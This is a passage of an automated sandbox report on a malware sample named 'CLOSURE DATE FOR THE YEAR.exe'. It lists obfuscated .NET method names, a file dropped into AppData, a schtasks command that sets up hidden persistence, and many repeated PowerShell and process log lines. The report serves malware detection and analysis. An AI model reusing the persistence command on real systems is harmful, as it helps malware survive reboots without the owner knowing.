                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, YUFVMJb03ibTQVxCwX.csHigh entropy of concatenated method names: 'HCPFsNNTjx', 'OxMFXXFDL7', 'dxhFwD4cSa', 'hMdFgY3pCc', 'zhJFPsTUuk', 'xlDFSqjQFO', 'nCgFdNLPgV', 'x9gFEPZAOE', 'upCFIgoik3', 'b3uF1KgDaJ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, n8h02gia35Fex3cMef.csHigh entropy of concatenated method names: 'UaIq38aZNE', 'Rc0qWpdhR2', 'NSV2BlHJ8b', 'sXR2PCaMDQ', 'iUn2S43rUW', 'pLs2LB775B', 'g1C2ddODYT', 'hGh2EnnQp6', 'dmA2ed2Tg5', 'Dru2I37TXS'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, ra2Pp4P84BlxAjGQIX.csHigh entropy of concatenated method names: 'oWwJ9ZkWCy', 'mDqJQ8WUf5', 'MLGJjrXTYY', 'O5AJGBm8uH', 'uVfJxahfxE', 'GhIJWHfmn6', 'IW3JXV0TAl', 'KMeJiLBRbb', 'Kndkgp25h4UGTjOZL3F', 'xIKBwy2Kku1FKA0DklM'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, KZnRcyw2XS3ZBSeVU9.csHigh entropy of concatenated method names: 'N2wJYbr8ou', 'IrGJl1Gyxk', 'C9bJqZhrls', 'UQ1JMORwcv', 'Sb0JURwMOg', 'DTdqRNojk7', 'NjEqvJV0nV', 'zTjqr0j2II', 'T2oqVW1264', 'Gl3qKqJG5b'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, MJ3rWMvHWVA6OCb5fl.csHigh entropy of concatenated method names: 'uxMkVBWyKb', 'ma3kuBKxFW', 'JXvtm5Gsc3', 'EiFto5X4OA', 'wVgk1UjvMo', 'esbk56rVhY', 'RndkbEsJUu', 'fB9kDQc0Bx', 'AbIkhIAQuA', 'tY2kyWlRT6'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, vt6OdGgtWVkrmoPpyf.csHigh entropy of concatenated method names: 'jpNAwx2Bye0Yi2tbaya', 'NweTip2tRbBEvxVD3Fm', 'xKDJtUPVIN', 'QakJ0auA7R', 'kgnJpllror', 'HYagQQ2QEiDwJkEKIuj', 'J09dcL2ME3XVWa40XhZ', 'wCnToZ2wDEj8i6aWMLN'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, tcTjZnfH2xCKW4Wn2U.csHigh entropy of concatenated method names: 'fAaoMgq5K1', 'lGeoUBooaK', 'HHco61U2Km', 'RbPo7V78h0', 'BcMo8efLZn', 'UcyoH2XS3Z', 'ThBfO1iawoEZ54mBXH', 'fu2cRScrjtd2NDtBiy', 'XHnoogPxvy', 'eN8oCIcrFq'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, iHL0ugXHc1U2KmhbPV.csHigh entropy of concatenated method names: 'a1M2G03DTC', 'sew2xSAuD6', 'vVT2suMmUQ', 'qxt2XKa1cY', 'Ct428tKg66', 'HHb2HmeqbK', 'nNj2khoE4m', 'yje2tjvu9m', 'wTX20gh7uo', 'Q6l2pNbSEI'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, swx3Z7yEPbC2qYGpNs.csHigh entropy of concatenated method names: 'ToString', 'z5DH1YaA2M', 'A8iHg3mIBZ', 'hifHBNWEEU', 'X7LHPytaVe', 'SYDHSUbXhY', 'UP9HLMkuHQ', 'oPsHdTb1S3', 's5yHErbVod', 'k8YHeKZi00'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, J3HuoK4x7sHRBmYd8P.csHigh entropy of concatenated method names: 'DuFj9X9Wi', 'mQeGEFFA9', 'qysx0ESBA', 'CLEWFSLDe', 'YRTXb5MZo', 'WQEiaYn3B', 'wMQFmQVBTMRQbwR7OM', 'U9qlcy5LhVL95ccJFs', 'eEuXwMmtbvZEAlwD0Z', 'q6atPqbcG'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, uS0YNRrX5wLVHg6CLX.csHigh entropy of concatenated method names: 'Sa408YcMXJ', 'LNH0kwUkbC', 'G3o0075fRP', 'BW80amW8kQ', 'BAZ0AX3liP', 'aQv0979cPm', 'Dispose', 'EfvtOmJg8V', 'cmFtluR13O', 'onWt2vL1pG'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, IJ2K90edp4HgKMGk5G.csHigh entropy of concatenated method names: 'cu6MQjT1Wl', 'NN9MNqcW29', 'SlPMjyP45d', 'BnWMGUbjsc', 'P20M3up2qA', 'YebMx2FfQp', 'shnMWL20dY', 'lANMs9MCNb', 'cXZMX0t8Kh', 'zyHMi7kBl7'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, ut7yIPoojS59To19taD.csHigh entropy of concatenated method names: 'YKdpu7WHeo', 'W1mpzohjtJ', 'idsamkLKj9', 'Rl7aoUyWrN', 'p4Ta4QXXNK', 'z5faCHHqZM', 'xdeafK0XLY', 'bD8aYKRhgJ', 'YNiaOEEM27', 'JQTal4XGQ1'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, i0rvbCom5cxEaaFcfVu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FI0p1Cjibd', 'H8mp5YqFlF', 'IippbxDirZ', 'cGypDljnoV', 'M9Xph5HX0x', 'ShSpyhQyv3', 'nY3pTBcRm9'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, msNyQU2nVWMubc2q1n.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pi44KDWbc1', 'GaV4uPm3uv', 'aCp4zeD8tC', 'KR4CmJjDSZ', 'uWECowchEe', 'HA7C4iotwh', 'N3MCCxXIJx', 'NWhQqKIkjl7XCJTV3Fd'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, dxLZjud1Le1aRTLBqp.csHigh entropy of concatenated method names: 'UsZMOePw1V', 'c85M2UdnPK', 'WJSMJdyHmP', 'kpuJuiWrMU', 'jHJJz3VfZJ', 'ReqMmPx8E9', 'tOMMol6iJa', 'mntM4JQPsG', 'DL3MCRBFlF', 'D6TMfy0jxs'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, IIb6nsuCF2hJDVepff.csHigh entropy of concatenated method names: 'txxp24Gh5A', 'iOcpqMQEec', 'j8rpJQ0OsH', 'lAjpMtffXT', 'Kqdp0s12fE', 'C4bpU8y9I4', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, jviyFnUkOEMiWAYfmN.csHigh entropy of concatenated method names: 'gjECY81nYS', 'yQOCOeVYQB', 'h6yClLU1vp', 'n9JC2R9y0m', 'mHmCqOfwam', 'RAiCJaWLVj', 'Qf3CMrFd8n', 'gcNCUlrEb3', 'lfnCnahlOt', 'RfEC6Ix2RZ'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, kNh5SizdpcJ7dyOosl.csHigh entropy of concatenated method names: 'JFcpx5onqD', 'wBipsfSr8t', 'HEBpXSiE4a', 'T2npwLlE5j', 'cERpgMSbFL', 'crHpPgPLO2', 'fTgpSQjwnw', 'CKsp9kOsPL', 'jOUpQoJaj5', 'NPopNPWONn'
                Source: 0.2.CLOSURE DATE FOR THE YEAR.exe.3ef7460.1.raw.unpack, MB18GvlNmXshVsF6VX.csHigh entropy of concatenated method names: 'Dispose', 'GLVoKHg6CL', 'WJf4g5Epmb', 'jXI5ityLne', 'ERqou1wwiC', 'gqoozFk91n', 'ProcessDialogKey', 'y4j4m8paIc', 'prf4oZRQqD', 'isW44PIb6n'
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeFile created: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IOsbBBIDAm" /XML "C:\Users\user\AppData\Local\Temp\tmpB774.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
